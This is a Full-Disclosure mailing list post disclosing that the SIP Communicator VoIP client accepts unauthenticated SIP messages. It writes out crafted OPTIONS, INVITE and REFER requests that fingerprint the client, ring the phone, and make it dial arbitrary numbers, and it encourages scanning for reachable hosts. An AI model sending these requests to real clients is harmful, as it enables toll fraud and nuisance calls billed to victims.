Salve Full-Disclosure! There is a nice open source software floating around for VoIP communication, namely "SIP Communicator". For phreakers phun the developers have not taken care of much security aspects when implementing the SIP protocol. Now as I got bored scanning around for open 5060 ports I decided to share my findings with you. Nice, eh? SIP defines a whole bunch of messages to communicate with clients. Some of the more useful for me are OPTIONS and (of course) INVITE and my personal favorite is definitely REFER. Funny things can also happen when using the MESSAGE type. Short intro to SIP first... SIP is a protocol mostly used over UDP. It has a HTTP like look and is used for Session Initialization of VoIP communication. It is used for signaling calls and host capabilities (i.e. supported protocols). Many other things can be done with SIP though. If you're interested read http://www.ietf.org/rfc/rfc3261.txt. Now, for the quick start, SIP defines the OPTIONS message to ask a client for what is supported and what is not. An OPTIONS request might look like this (... means truncated for readability): OPTIONS sip:1234567890@snafu.com SIP/2.0 Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d ... Max-Forwards: 70 To: From: "A Friend" ;tag=70e763707a Call-ID: 112071fe7c CSeq: 63104 OPTIONS Contact: Accept: application/sdp Content-Length: 0 This is pretty much self-explanatory. The from-line tells who is requesting the information, the To-line says to whom it is sent. Now before responding *good* SIP clients check if the 'To'-line matches the number that is really registered on the host. Well, *bad* clients don't :-) As you might guess this is where it begins to get phunny... really, this is the single stupid point that makes a butterfly change the weather... If you have a client running SIP Communicator you can easily use the above OPTIONS sample and (no matter what 'From' or 'To' lines contain) it will honestly answer to your request. It might respond with sth. like (... means truncated for readability): SIP/2.0 200 OK To: ;tag=df7a2b75 Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d5d72ee20183d3d146797 ... CSeq: 63104 OPTIONS Call-ID: 112071fe7c From: "A Friend" ;tag=70e763707a Contact: "4461288" User-Agent: SIP Communicator1.0-alpha6-nightly.build.3041Windows 7 Allow: INFO,OPTIONS,MESSAGE,BYE,REFER,ACK,CANCEL,NOTIFY,INVITE ... Allow-Events: refer Content-Length: 0 Not that interesting you might say. But it tells you a lot! The "User-Agent" tells you that there is "SIP Communicator" running (and also the version up to the last bit - crazy!). Take a closer look at the "Contact" line. It tells you the LAN IP of the host, but don't care about it, its useless for now. It further tells you the registrar and the phone number that are registered on the host. In this case it's "sip:4461288@sipgate.de". Thats the host's "SIP identity". Keep this in mind. Before we start the real phunny things let's just ring the phone a bit. All you need to make SIP Communicator ring is an INVITE message. As with OPTIONS it will react to the message regardless of the 'To' and 'From' headers. So the following message might just do the job (... means truncated for readability): INVITE sip:1337@snafu.com:5060;transport=udp;registering_acc=sn ... Record-Route: Via: SIP/2.0/UDP 127.0.0.1;branch=stupidbranchtag From: "A Friend" ;tag=f5cb6e692d To: Contact: Call-ID: 2f6633739b@snafu.com CSeq: 102 INVITE Max-Forwards: 70 Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Supported: replaces Content-Type: application/sdp Content-Length: 449 v=0 o=root 23830 23830 IN IP4 98.15.131.42 s=session c=IN IP4 98.15.131.42 t=0 0 m=audio 35430 RTP/AVP 8 0 3 97 18 112 101 a=rtpmap:8 PCMA/8000 a=rtpmap:0 PCMU/8000 a=rtpmap:3 GSM/8000 a=rtpmap:97 iLBC/8000 a=fmtp:97 mode=30 a=rtpmap:18 G729/8000 a=fmtp:18 annexb=no a=rtpmap:112 G726-32/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=silenceSupp:off - - - - a=ptime:20 a=sendrecv a=direction:active a=nortpproxy:yes And it turns out, SIP Communicator happily starts ringing just as if someone was calling. Ok, that is way phunny but you know SIP is much more powerful. A very interesting part of the SIP protocol defines the "REFER" message. That is some kind of a relay message that tells a host "Please put me through to XYZ". Again, this a very useful feature of SIP but only when the VoIP software acts carefully when receiving these messages. As mentioned before, "SIP Communicator" doesn't handle that very restrictive. In contrast to an INVITE message "SIP Communicator" needs correct values for the sip-ID of the host it resides on. So for constructing a valid REFER request we need the users sip-ID. Remember the OPTIONS message and the "Contact" line in its response? We already got the ID! With these infos and some enclosure we can construct a REFER request that lets SIP Communicator call an arbitrary telephone number. We use the origins sip-ID for REFER and Contact lines and construct a sip-ID from the phone number to call and the SIP provider of the client in the "Refer-To" line. We might want call the number 1-800-FUCKYOU (that is 18003825968): REFER sip:4461288@sipgate.de SIP/2.0 Via: SIP/2.0/UDP 1.2.3.4;branch=31f175a7e2d ... Max-Forwards: 70 To: From: "A Friend" ;tag=ae894a32e8 Call-ID: 5fae3cc039 CSeq: 93809824 REFER Contact: Refer-To: sip:18003825968@sipgate.de Content-Length: 0 If you then get an answer that says "SIP/2.0 202 Accepted" you got it. - PLEASE - be advised, that calling a number from someones SIP phone might generate costs on his bill. If the user using SIP Communicator has a prepaid account it might not even work if you try to call so. on the landline and there is not enough money available to make that call. Be nice and don't spend other people's money!! There are not much SIP Communicator installations around that are reachable over the inet and so you can hardly find some hosts to attack. Instead you may find many other products responding to probes but as far as I can tell they are all much better protected. Anyway, scanning for vulnerable hosts is an easy task because we're using UDP. No three-way-handshake and nasty things. Just send and forget. Maybe it is just the right time to dive deeper into SIP and VoIP things. New applications come out each day, the industry around that sector grows and grows and SS7 and companions are still underdeveloped. keep on phrocking, stormrider _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/